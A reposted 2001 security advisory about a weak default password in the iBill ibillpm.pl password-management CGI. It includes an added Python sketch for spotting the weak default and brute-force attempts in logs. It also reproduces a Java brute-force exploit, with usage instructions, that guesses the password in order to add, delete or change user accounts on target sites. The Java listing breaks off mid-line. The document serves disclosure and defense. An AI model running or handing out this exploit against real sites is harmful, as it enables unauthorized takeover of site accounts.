Security Vulnerability in the iBill Management Script

2008-04-09 04:27:52 Source: Internet

Published: 2001-10-25
Updated: 2001-10-30

Affected systems:

iBill Internet Billing Company Processing Plus

Description:

BUGTRAQ ID: 3476

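iBill is Internet billing software that provides a secure payment process for
e-commerce. Its password management script, "ibillpm.pl", has a security problem
that may allow a remote attacker to easily obtain the administrator password by
exhaustive search (brute force).

This is because the script's default password is the client's "MASTER_ACCOUNT" name
followed by a combination of two lowercase letters, and the "MASTER_ACCOUNT" name
can be obtained from the HTML source of the signup page.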

<*Source: MK Ultra (mkultra@dqc.org)
Link: http://archives.neohapsis.com/archives/bugtraq/2001-10/0242.html
*>
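
The weakness described above can be checked from the defender's side. The following Python sketch is an added example, not code from the original advisory or from iBill: it tests whether a configured $authpwd still follows the default MASTER_ACCOUNT plus two-letter scheme, and flags clients outside an allow-list that send bursts of POST requests to the CGI in an Apache-style access log. The function names, the threshold, the allow-list and the sample log lines (documentation address ranges) are assumptions constructed for illustration.

```python
import re
from collections import Counter

CGI_PATH = "/cgi-bin/ibillpm.pl"   # default path named in the advisory
KEYSPACE = 26 * 26                 # two lowercase letters: 676 candidates
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) ')

def master_account(form_value):
    """Normalize the signup form's hidden 'account' value: drop the
    optional dash and the trailing 3-digit sub-account."""
    digits = form_value.replace("-", "")
    if not digits.isdigit() or len(digits) <= 3:
        raise ValueError("unexpected account value: %r" % form_value)
    return digits[:-3]

def uses_default_scheme(authpwd, form_value):
    """True if authpwd is MASTER_ACCOUNT plus exactly two lowercase letters."""
    pattern = re.escape(master_account(form_value)) + "[a-z]{2}"
    return re.fullmatch(pattern, authpwd) is not None

def suspicious_sources(log_lines, allowed_ips, threshold=20):
    """Count POSTs to the CGI per client outside the allow-list and return
    the clients at or above the threshold. The script's 501 failure code is
    not an HTTP status, so requests are counted rather than failures."""
    hits = Counter()
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, method, path, _status = m.groups()
        if method == "POST" and path.split("?")[0] == CGI_PATH and ip not in allowed_ips:
            hits[ip] += 1
    return {ip: n for ip, n in hits.items() if n >= threshold}

def sample_log():
    """Constructed access-log lines (documentation address ranges)."""
    fmt = '%s - - [25/Oct/2001:10:00:%02d +0000] "%s %s HTTP/1.1" 200 3 "-" "-"'
    rows = [fmt % ("203.0.113.7", i, "POST", CGI_PATH) for i in range(40)]
    rows += [fmt % ("192.0.2.10", 1, "POST", CGI_PATH)] * 30  # allow-listed
    rows.append(fmt % ("198.51.100.4", 2, "GET", "/index.html"))
    return rows

if __name__ == "__main__":
    print(uses_default_scheme("123456qz", "123456-500"))
    print(suspicious_sources(sample_log(), allowed_ips={"192.0.2.10"}))
```

A $authpwd that the first check flags falls inside a 676-value search space and should be replaced, as the advisory's test code comment suggests.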

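Test method:

Warning

The following program (method) may be offensive in nature and is provided for security research and teaching only. Use at your own risk!


MK Ultra (mkultra@dqc.org) provided the following test code: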

// 10/25/2001

import java.net.*;
import java.io.*;

/**
 * IBillHack class for informational purposes only.
 * This program brute-forces POST requests to the iBill Password Management CGI
 * and allows us to add/delete usernames and change passwords on websites
 * that used iBill Password Management using default installation.
 * By default iBill sets up the $authpwd as MASTER_ACCOUNTxx, where "xx"
 * is a pair of letters [a-z]. It is suggested that all clients of iBill
 * that use Password Management acquire a new $authpwd for their ibillpm.pl
 * script.
 * MASTER_ACCOUNT can be found as part of the <FORM> tag on the signup pages:
 * <input type="hidden" name="account" value="123456-500">
 * OR
 * <input type="hidden" name="account" value="123456500">
 * The last 3 digits are the sub-account, and sometimes there is a dash,
 * sometimes not. In this case MASTER_ACCOUNT=123456.
 *
 * /cgi-bin/ibillpm.pl is the default path to the CGI. Sometimes the webmaster
 * is smart enough not to use the default and request that $authpwd be changed
 * to something more secure. In addition to these measures, a webmaster can
 * also modify their httpd.conf to only allow iBill IP addresses to request
 * the Password Management CGI script.
 *
 * The correct $authpwd is not saved here. That is an optional exercise for
 * the reader.
 *
 * Here are the return codes from the ibillpm.pl script (not HTTP status codes)
 * and their meaning:
 *
 * 501 - authentication failed
 * 502 - invalid request type (command must be add, delete, or chgpwd)
 * 503 - failed to locate the password file
 * 504 - failed to open the password file
 * 505 - specified user already exists
 * 506 - specified user doesn't exist
 * 507 - invalid username
 * 508 - invalid password
 *
 * 201 - add user success
 * 202 - delete user success
 * 203 - change password success
 *
 */

public class IBillHack {

    public static void main(String args[]) {
        if (args.length != 6) {
            System.err.println("Usage: java IBillHack <target_hostname> </path/to/cgi-bin/ibillpm.pl> " +
                               "<add|delete|chgpwd> <username> <password> <master_account>");
            System.err.println("Example: java IBillHack www.somesite.com /cgi-bin/ibillpm.pl add bob 1pass 123456");
            System.exit(1);
        }

        char letters[] = {
            'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm',
            'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z'
        };

        for (int i = 0; i < letters.length; i++) {
            for (int j = 0; j < letters.length; j++) {
                try {
                    Socket s = new Socket(InetAddress.getByName(args[0]), 80);
                    StringBuffer headers = new StringBuffer();

                    headers.append("POST " + args[1] + " HTTP/1.1\n");
                    headers.append("Referer: http://" + args[0] + args[1] + "\n");
                    headers.append("Content-Type: application/x-www-form-urlencoded\n");
                    headers.append("User-Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)\n");
                    headers.append("Host: " + args[0] + "\n");

                    StringBuffer query = new StringBuffer();

                    query.append("\nauthpwd=" + args[5] + letters[i] +
                                 letters[j] + "&reqtype=" + args[2] +
                                 "&username=" + args[3] + "&password="
